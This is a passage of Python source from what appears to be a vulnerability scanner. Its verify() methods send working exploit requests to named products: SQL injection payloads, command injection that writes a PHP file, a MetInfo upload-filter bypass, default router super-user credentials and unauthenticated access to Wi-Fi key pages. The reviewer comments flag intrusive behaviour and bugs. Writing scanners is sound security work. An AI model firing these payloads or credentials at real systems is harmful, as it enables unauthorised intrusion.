                base + '/WebPages/singlelogin.php?loginId=1%20and%20extractvalue(0x1,concat(0x23,(select%20md5(1))))%23&submit=t',
            )
            md5_prefix = 'c4ca4238a0b923820dcc509a6f75849'
            for probe_url in probe_urls:
                status, _, body, _, _ = hh.http(probe_url)

                if status != 200 or md5_prefix not in body:
                    continue
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Command injection probe for ``/acc/debug/bytecache_run_action.php`` (``engine``).

        Ref: http://www.wooyun.org/bugs/wooyun-2015-0117621

        The ``engine`` parameter is wrapped in shell pipes so that
        ``echo testvultest3 > a1.php`` runs on the appliance; the file is then
        fetched from ``/acc/debug/a1.php`` and its body checked for the marker.
        The status code of the fetch is not examined.

        NOTE(review): intrusive — ``a1.php`` is written into the target's web
        tree and never cleaned up.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            base = self.target
            inject_url = base + "/acc/debug/bytecache_run_action.php?action=2&engine=%20|%20echo%20testvultest3%20>%20a1.php%20|%20&ipfilter=10"
            hh.http(inject_url)

            _, _, body, _, _ = hh.http(base + '/acc/debug/a1.php')
            if 'testvultest3' in body:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
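    def verify(self):
        """Check a ZTE-style CPE for the factory ``telecomadmin`` super-user login.

        Ref: http://www.wooyun.org/bugs/wooyun-2014-049406

        Fetches the login page to read the anti-CSRF ``Frm_Logintoken`` value
        (an empty token is sent if none is found), then posts the well-known
        ISP maintenance credentials.  A 200 response whose body embeds
        ``src="template.gch"`` — the post-login frame — is reported as a
        successful login with default credentials.

        Changes over the original: the token pattern is now a raw string
        (it used backslash escapes inside a plain string, which Python 3.12+
        flags as invalid) compiled once; and a ``getpage.gch?...logout=1`` URL
        that was built but never requested has been removed.

        NOTE(review): the password is sent double-encoded (``nE7jA%255m``);
        whether the device ends up seeing ``nE7jA%5m`` depends on how hackhttp
        and the router decode the body — verify on a known device before
        trusting a negative result.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            base = self.target
            # The login page embeds a 5-8 digit token that must accompany the POST.
            token_re = re.compile(
                r'document\.getElementById\("Frm_Logintoken"\).value = "(\d{5,8})";'
            )
            _, _, login_page, _, _ = hh.http(base)
            match = token_re.search(login_page)
            token = match.group(1) if match else ""

            login_form = "Username=telecomadmin&Password=nE7jA%255m&Frm_Logintoken=" + token
            status, _, body, _, _ = hh.http(base, post=login_form)
            if status == 200 and "src=\"template.gch\"" in body:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))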
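    def verify(self):
        """Boolean-based SQL injection probe on the ``nowlx`` parameter.

        Ref: http://www.wooyun.org/bugs/wooyun-2010-0107187

        ``matchurl(self.target)`` (defined elsewhere in this module) supplies
        the candidate URLs.  Each is requested with ``nowlx=m' or '1'='1`` and
        then ``nowlx=m' or '1'='2``; a report is emitted when both responses
        are HTTP 200, the always-true page contains ``class="gray"`` and the
        always-false page does not.  The report message still names
        ``self.target``.

        Fixes over the original: the loop bound each candidate as ``arg`` but
        then always requested ``self.target``, so every iteration repeated the
        same two requests (and could report repeatedly) — the candidate URL is
        now the one probed, as the original's commented-out
        ``security_hole(arg + '?nowlx=m' ...)`` intended; ``m2 == None`` has
        become a plain absence test.  The exact shape of what ``matchurl``
        returns is not visible here — it is assumed to yield URLs that accept
        a ``?nowlx=`` query appended directly.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            marker = 'class="gray"'
            always_true = '?nowlx=m%27%20or%20%271%27=%271'
            always_false = '?nowlx=m%27%20or%20%271%27=%272'
            for candidate in matchurl(self.target):
                status_t, _, body_t, _, _ = hh.http(candidate + always_true)
                status_f, _, body_f, _, _ = hh.http(candidate + always_false)

                if status_t != 200 or status_f != 200:
                    continue
                # Vulnerable pattern: the marker appears only for the true branch.
                if marker in body_t and marker not in body_f:
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{name}漏洞'.format(target=self.target,
                                                      name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))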
    def verify(self):
        """MetInfo ``feedback/uploadfile_save.php`` arbitrary file upload probe.

        Sends a hand-built multipart POST (``met_file_format=pphphp`` sneaks a
        ``.php`` upload past the extension filter) whose file body is
        ``<?php echo md5(1); ?>``.  The server names the stored file by a
        timestamp, so the scan then walks ``/upload/file/<t>.php`` for
        ``t`` from ``now+100`` to ``now+9999`` and reports the first 200
        response containing the MD5 of ``1``.

        NOTE(review): this is noisy and intrusive.  Up to 9 900 GET requests
        are made per target, the raw request carries a fixed ``Host:
        localhost`` and ``Content-Length: 423`` (whether hackhttp rewrites
        them is not visible here), the guess range assumes the scanner's
        clock is close to the server's, and a successfully uploaded PHP file
        is left on the target.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            upload_url = self.target + \
                "/feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo"

            raw_request = '''
POST /feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo HTTP/1.1
Host: localhost
Content-Length: 423
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE1toBNeESf6p0uXQ
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=hfqa37uap92gdaoc2nsco6g0n1

------WebKitFormBoundaryE1toBNeESf6p0uXQ
Content-Disposition: form-data; name="fd_para[1][para]"

filea
------WebKitFormBoundaryE1toBNeESf6p0uXQ
Content-Disposition: form-data; name="fd_para[1][type]"

5
------WebKitFormBoundaryE1toBNeESf6p0uXQ
Content-Disposition: form-data; name="filea"; filename="test.php"
Content-Type: application/x-php

<?php echo md5(1); ?>
------WebKitFormBoundaryE1toBNeESf6p0uXQ--
    '''
            # Upload; the response itself is not inspected.
            hh.http(upload_url, raw=raw_request)

            # The stored name is a server timestamp, so guess forward from ours.
            md5_of_1 = "c4ca4238a0b923820dcc509a6f75849b"
            stamp = int(time.time())
            for offset in range(100, 10000):
                guess_url = self.target + '/upload/file/%s.php' % (str(stamp + offset))
                status, _, body, _, _ = hh.http(guess_url)

                if status == 200 and md5_of_1 in body:
                    self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                        target=self.target, name=self.vuln.name))
                    break

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Unauthenticated management-page check for ZTE ``.gch`` routers.

        Ref: http://www.wooyun.org/bugs/wooyun-2010-066850

        Requests four pages that should require a login and reports the host
        when the page-specific field name is present in the body:
        ``status_dev_info_t.gch`` → ``Frm_CarrierName``,
        ``manager_dev_config_t.gch`` → ``ConfigUpload``,
        ``wlan_security.gch`` → ``PreSharedKey`` (the Wi-Fi passphrase page),
        ``manager_log_conf_t.gch`` → ``Transfer_meaning``.
        The HTTP status is not checked, and every page is tried, so a host can
        be reported up to four times.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            page_markers = (
                ('/status_dev_info_t.gch', 'Frm_CarrierName'),
                ('/manager_dev_config_t.gch', 'ConfigUpload'),
                ('/wlan_security.gch', 'PreSharedKey'),
                ('/manager_log_conf_t.gch', 'Transfer_meaning'),
            )
            for page, marker in page_markers:
                _, _, body, _, _ = hh.http(self.target + page)

                if marker not in body:
                    continue
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Time-based check for SQL injection in several Kingdee JSP endpoints.

        For every entry in ``payloads`` two requests are sent: the entry as
        written (``WAITFOR DELAY '0:0:0'``, i.e. a zero-second baseline) and
        the same entry with the delay rewritten to ``0:0:5``.  The vulnerability
        is reported when both requests returned a non-zero status and the
        delayed request took more than three seconds longer than the baseline.
        Exceptions are caught and only logged; nothing is returned.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            payloads = [
                "/kingdee/Template/TemplateEdit.jsp?RecordID=1'%20WAITFOR%20DELAY%20'0:0:0'--%20",
                "/kingdee/Template/TemplateSave.jsp?FileName=1'%20WAITFOR%20DELAY%20'0:0:0'--%20",
                "/kingdee/DocumentEdit.jsp?RecordID=1'%20WAITFOR%20DELAY%20'0:0:0'--%20&UserName=1",
                "/kingdee/DocumentSave.jsp?RecordID=1'%20WAITFOR%20DELAY%20'0:0:0'--%20&Template=1&Subject=1&Author=1&FileDate=1&FileType=1&HTMLPath=1",
                "/kingdee/DocumentShow.jsp?Template=1'%20WAITFOR%20DELAY%20'0:0:0'--%20&UserName=1"
            ]
            for p in payloads:
                url1 = self.target + p
                # Same request with a 5-second delay substituted in.
                url2 = self.target + p.replace("0:0:0", "0:0:5")
                t1 = time.time()
                code1, head1, res1, err1, _1 = hh.http(url1)
                t2 = time.time()
                code2, head2, res2, err2, _2 = hh.http(url2)
                t3 = time.time()
                # ``t3 - t2 - t2 + t1`` == (t3 - t2) - (t2 - t1): the delayed
                # request's duration minus the baseline duration.  A single
                # pair of measurements is sensitive to network jitter; the
                # ``!= 0`` status test presumably relies on hackhttp returning
                # 0 on a failed request — confirm.
                if code1 != 0 and code2 != 0 and t3 - t2 - t2 + t1 > 3:
                    #security_hole(url2 + "has time-based blind")
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{name}漏洞'.format(target=self.target,
                                                      name=self.vuln.name))

        except Exception as e:
            # Broad catch keeps the scanner loop alive; the error is only logged.
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Boolean-based check for SQL injection in the ``pid`` parameter of ``index.php``.

        Two requests are sent whose ``pid`` condition evaluates to true
        (``1011-1010=1``) and false (``1011-1010=2``) respectively.  The
        vulnerability is reported when the first request returned 200 and
        its body is not contained in the second body.  Exceptions are caught
        and only logged; nothing is returned.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            # Original author's note, left verbatim.  It is a bare string
            # expression inside the ``try`` body, not a docstring.
            """
            该产品是用于:滑坡监测,尾矿库安全监测,水库大坝安全监测,桥梁健康监测,沉降塌陷监测,建筑监测,机械精密控制,精准农业导航,和精密定位的GNSS接收机。
            POC Name  : 中海达VNet6专业型参考站接收机 SQL注入
            使用默认的账号密码(zhdgps/zhdgps)
            """
            # Author's remark: "almost every one has this vulnerability??"
            hh = hackhttp.hackhttp()
            arg = self.target
            payload1 = '/index.php?lang=en&pid=200%20and%201011-1010=1'  # 1011-1010 is evaluated server-side (true condition)
            payload2 = '/index.php?lang=en&pid=200%20and%201011-1010=2'  # same arithmetic, false condition

            url1 = arg + payload1
            url2 = arg + payload2

            # ``head`` and ``errcode`` are overwritten by the second call; only
            # ``code1`` and the two bodies are used below.
            code1, head, res1, errcode, _ = hh.http(url1)
            code2, head, res2, errcode, _ = hh.http(url2)
            # NOTE(review): ``res1 not in res2`` is a substring test, not an
            # equality test — it is true whenever the "true" body is not a
            # substring of the "false" body.  ``code2`` is never checked.
            if (code1 == 200) and res1 not in res2:
                #security_hole(url1 + ' SQL injection')
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            # Broad catch keeps the scanner loop alive; the error is only logged.
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Error-based check for SQL injection in several ``index.php?s=`` routes.

        Each entry of ``payloads`` is appended to the scan target and the
        vulnerability is reported when the MySQL error fragment
        ``'1064 You have'`` appears in the response body.  Exceptions are
        caught and only logged; nothing is returned.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            # NOTE(review): the nine string literals below are adjacent with
            # no separating commas, so Python concatenates them into ONE
            # string at compile time and ``payloads`` has a single element.
            # The loop therefore runs once, against a URL that is all nine
            # routes joined together — almost certainly not what was intended.
            payloads = [
                '/index.php?s=/home/shopcart/getPricetotal/tag/1%27'
                '/index.php?s=/home/shopcart/getpriceNum/id/1%27'
                '/index.php?s=/home/user/cut/id/1%27'
                '/index.php?s=/home/service/index/id/1%27'
                '/index.php?s=/home/pay/chongzhi/orderid/1%27'
                '/index.php?s=/home/pay/index/orderid/1%27'
                '/index.php?s=/home/order/complete/id/1%27'
                '/index.php?s=/home/order/detail/id/1%27'
                '/index.php?s=/home/order/cancel/id/1%27'
            ]
            for payload in payloads:
                verify_url = self.target + payload
                code, head, res, errcode, _ = hh.http(verify_url)

                # Only the body is inspected; the status code is not checked.
                if '1064 You have' in res:
                    #security_hole("infomation leak:"+poc)
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{name}漏洞'.format(target=self.target,
                                                      name=self.vuln.name))

        except Exception as e:
            # Broad catch keeps the scanner loop alive; the error is only logged.
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Check a Linksys X2000 diagnostics endpoint for unauthenticated command execution.

        Sends one request to ``/apply.cgi`` carrying the diagnostics form in
        ``data`` and a hard-coded ``Cookie`` header, and reports the
        vulnerability when both ``'X2000'`` and the ping-form validation
        message appear in the response body.  Exceptions are caught and only
        logged; nothing is returned.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            data = 'submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_size=32&ping_times=5&ping_ip=ls'
            url = self.target + '/apply.cgi'
            # ``data`` is passed as the second positional argument and the
            # cookie as a keyword; presumably hackhttp treats the positional
            # body as a POST payload — confirm against its signature.
            code, head, res, errcode, _ = hh.http(
                url,
                data,
                Cookie=
                'wys_userid=admin,wys_passwd=5982861B34B74E9A6DAD66A9895CDFFF')

            # Only the body is inspected; ``code`` is never checked.
            if 'X2000' in res and 'You must input an IP Address or Domain Name' in res:
                #security_hole('Linksys X2000 Command Execution AND Unauthorized access!')
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            # Broad catch keeps the scanner loop alive; the error is only logged.
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Error-based check for SQL injection through the ``reachstone_uid`` cookie.

        Requests ``/include/authrp.php`` with a crafted cookie and reports the
        vulnerability when the response status is 200 and the body contains
        ``md5_1`` (a prefix of the md5 digest of ``'1'``; the full digest is
        used elsewhere in this file).  Exceptions are caught and only logged;
        nothing is returned.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # refer: http://www.wooyun.org/bugs/wooyun-2014-058987
            hh = hackhttp.hackhttp()
            arg = self.target
            # First 9 hex characters of md5('1'); matching on the prefix only.
            md5_1 = 'c4ca4238a'
            # cookie injection
            cookie = 'reachstone_uid=1 and extractvalue(0x1,concat(0x23,md5(1)))'
            url = arg + '/include/authrp.php'
            # Note the lower-case ``cookie=`` keyword here versus ``Cookie=``
            # in other verifiers in this file — presumably hackhttp accepts
            # both, but confirm.
            code, head, res, err, _ = hh.http(url, cookie=cookie)

            if (code == 200) and (md5_1 in res):
                #security_hole('SQL Injection: {url} Cookie: {cookie}'.format(url=url,cookie=cookie))
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            # Broad catch keeps the scanner loop alive; the error is only logged.
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Boolean-based check for SQL injection in the ``i_id`` parameter of a JSP interface.

        Iterates ``i_id`` over 1..9 until a page that returns 200 and does
        not contain the "no data" marker is found.  For that page two more
        requests are made with an appended true and false condition; the
        vulnerability is reported when the true-condition response equals
        the original one and the false-condition response differs.  The loop
        stops after the first page with data whether or not a report was
        made.  Exceptions are caught and only logged; nothing is returned.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            arg = self.target
            # NOTE(review): ``id`` shadows the builtin for the loop's scope.
            for id in range(1, 10):
                payload = '/vc/vc/interface/styletop/coltop_interface.jsp?i_id=%s' % id
                target = arg + payload
                code, head, res, errcode, _ = hh.http(target)
                # '没有数据' is the application's "no data" marker.
                if code == 200 and '没有数据' not in res:
                    code1, head1, res1, errcode1, _1 = hh.http(target +
                                                               '%20and%201=1')
                    code2, head2, res2, errcode2, _2 = hh.http(target +
                                                               '%20and%201=2')
                    # Exact body equality is required for the true case, so any
                    # dynamic content (timestamps, tokens) in the page would
                    # suppress the report.
                    if code == code1 and res == res1:
                        if res1 != res2:
                            # security_hole(target)
                            self.output.report(
                                self.vuln, '发现{target}存在{name}漏洞'.format(
                                    target=self.target, name=self.vuln.name))
                    # ``break`` sits inside the outer ``if``: the first id
                    # whose page has data ends the loop regardless of outcome.
                    break

        except Exception as e:
            # Broad catch keeps the scanner loop alive; the error is only logged.
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Error-based check for SQL injection in POST parameters of an ``.APPPROCESS`` endpoint.

        Sends each body in ``posts`` to ``target`` and reports the
        vulnerability when the response status is 200 and the marker
        ``'hentai'`` (the concatenation the injected expression builds)
        appears in the body.  There is no ``break``, so one report may be
        emitted per matching body.  Exceptions are caught and only logged;
        nothing is returned.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            # __Refer___ = http://www.wooyun.org/bugs/wooyun-2010-065322
            payload = '/ACTIONQUERYELECTIVERESULTBYTEACHSECRETARY.APPPROCESS?mode=2'
            target = self.target + payload
            # Two form bodies that differ only in which parameter carries the
            # injected expression (``CourseModeID`` vs ``YearTermNO``).
            posts = [
                "bt_DYXZ=%b4%f2%d3%a1%d1%a1%d6%d0&bt_FXXD=%b7%b4%cf%f2%d1%a1%b6%a8&bt_QBCX=%c8%ab%b2%bf%b3%b7%cf%fa&bt_QBXZ=%c8%ab%b2%bf%d1%a1%d6%d0&CourseModeID=1)%20and%201=utl_inaddr.get_host_address('hen'||'tai')%20and%20(1=1&ReportTitle=%b9%fe%b6%fb%b1%f5%c9%cc%d2%b5%b4%f3%d1%a72014-2015%d1%a7%c4%ea%b5%da%b6%fe%d1%a7%c6%da%c9%cf%bf%ce%d1%a7%c9%fa%c3%fb%b5%a5&ScheduleSwitch=0&TeacherNO=130112&YearTermNO=16",
                "bt_DYXZ=%b4%f2%d3%a1%d1%a1%d6%d0&bt_FXXD=%b7%b4%cf%f2%d1%a1%b6%a8&bt_QBCX=%c8%ab%b2%bf%b3%b7%cf%fa&bt_QBXZ=%c8%ab%b2%bf%d1%a1%d6%d0&CourseModeID=1&ReportTitle=%b9%fe%b6%fb%b1%f5%c9%cc%d2%b5%b4%f3%d1%a72014-2015%d1%a7%c4%ea%b5%da%b6%fe%d1%a7%c6%da%c9%cf%bf%ce%d1%a7%c9%fa%c3%fb%b5%a5&ScheduleSwitch=0&TeacherNO=1&YearTermNO=1%20and%201=utl_inaddr.get_host_address('hen'||'tai')"
            ]
            for post in posts:
                # Body is passed through hackhttp's ``post=`` keyword.
                code, head, body, errcode, final_url = hh.http(target,
                                                               post=post)
                if code == 200 and 'hentai' in body:
                    #security_warning(target+' has post inject')
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{name}漏洞'.format(target=self.target,
                                                      name=self.vuln.name))

        except Exception as e:
            # Broad catch keeps the scanner loop alive; the error is only logged.
            self.output.info('执行异常{}'.format(e))